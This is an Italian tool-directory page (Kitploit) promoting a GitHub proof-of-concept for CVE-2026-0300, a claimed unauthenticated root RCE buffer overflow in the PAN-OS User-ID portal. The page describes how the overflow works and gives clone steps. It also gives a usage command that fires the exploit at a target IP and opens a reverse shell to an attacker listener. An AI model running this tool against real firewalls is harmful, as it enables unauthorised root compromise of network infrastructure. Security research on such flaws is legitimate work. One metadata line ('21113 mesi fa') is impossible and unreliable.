Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-0300-POC — Proof-of-concept per CVE-2026-0300, un buffer overflow critico nel portale User-ID di PAN-OS che consente l'esecuzione remota di codice non autenticata con privilegi di root. | Kitploit
Strumenti/GitHubGitHub/p3nt3st3r-star/cve-2026-0300-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubp3nt3st3r-star/cve-2026-0300-poc

CVE-2026-0300-POC

Proof-of-concept per CVE-2026-0300, un buffer overflow critico nel portale User-ID di PAN-OS che consente l'esecuzione remota di codice non autenticata con privilegi di root.

Vedi Repository
21113 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ CVE-2026-0300: Analisi RCE del Portale User-ID™ PAN-OS

Proof-of-Concept di Ricerca: CWE-787 Scrittura Fuori dai Limiti

Security Python License Dependencies

📌 Panoramica

CVE-2026-0300 è una vulnerabilità di buffer overflow ad alta gravità identificata nel Portale di Autenticazione User-ID™ (Captive Portal) di Palo Alto Networks PAN-OS. Questo repository di ricerca dimostra la logica tecnica della vulnerabilità, concentrandosi in particolare su come un pacchetto di rete non autenticato possa portare a Remote Code Execution (RCE) con privilegi di root.


📊 Analisi della Vulnerabilità

CaratteristicaDettagli
ID CVECVE-2026-0300
Punteggio di Gravità9.3 (Critico)
Tipo di DebolezzaCWE-787: Scrittura Fuori dai Limiti
Vettore di AttaccoRete (Non Autenticato)
Privilegi RichiestiNessuno
Interazione UtenteNessuna
Software InteressatoPAN-OS 12.1, 11.2, 11.1, 10.2

🔬 Meccanismo Tecnico

La vulnerabilità si verifica quando il servizio del Portale di Autenticazione User-ID non riesce a validare la lunghezza dei dati in arrivo prima di scriverli in un buffer di memoria.

  1. Il Buffer: Il servizio alloca un'area di memoria a dimensione fissa per elaborare le richieste del portale.
  2. L'Overflow: Una richiesta POST appositamente predisposta invia un payload che supera questa dimensione.
  3. La Sovrascrittura: I dati in eccesso sovrascrivono lo stack/heap, consentendo all'attaccante di controllare il Instruction Pointer (EIP/RIP) ed eseguire shellcode arbitrario.

🛠️ Installazione e Configurazione

1. Prerequisiti

  • Python 3.9 o superiore.
  • Nessuna libreria esterna richiesta (Utilizza i moduli standard socket, struct e argparse).

2. Clonazione dello Strumento di Ricerca

Clona il repository

root@kitploit:~
git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git

Naviga nella cartella

root@kitploit:~
cd CVE-2026-0300-POC

Rendi eseguibile lo script

root@kitploit:~
chmod +x research_poc.py

🚀 Guida all'Utilizzo

Questo strumento è progettato con una CLI (Interfaccia a Riga di Comando) professionale.

Comando Base

root@kitploit:~
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>

Parametri Avanzati

FlagNomeDescrizionePredefinito
-t--target(Obbligatorio) Indirizzo IP del firewall di destinazione.N/D
-p--portLa porta su cui è in esecuzione il Portale User-ID.6082
-o--offsetLa lunghezza in byte per raggiungere il punto di overflow della memoria.2048
-r--retL'indirizzo di ritorno esadecimale.0xdeadbeef
-l--lhostindirizzo IP della reverse shellIl tuo IP
-L--lportLa tua Porta di Ascolto4444

🛡️ Mitigazione e Sicurezza

  • Aggiorna PAN-OS: Installa le ultime patch di sicurezza (Rilasciate a maggio 2026).
  • Restrizione IP: Limita l'accesso al portale alle zone IP interne fidate.
  • Disabilita il Portale: Se l'autenticazione User-ID non è richiesta, disabilita la funzionalità.

⚠️ Disclaimer Etico e Legale

SOLO PER SCOPI EDUCATIVI E DI RICERCA AUTORIZZATA. I test non autorizzati contro sistemi che non possiedi sono illegali. L'autore non è responsabile per qualsiasi uso improprio di questo codice di ricerca. Usalo in modo responsabile per migliorare la sicurezza globale. Sviluppato Da: https://t.me/p3Nt3st3rsTAr Data di Scoperta della Vulnerabilità: 07 maggio 2026

Scarica lo strumento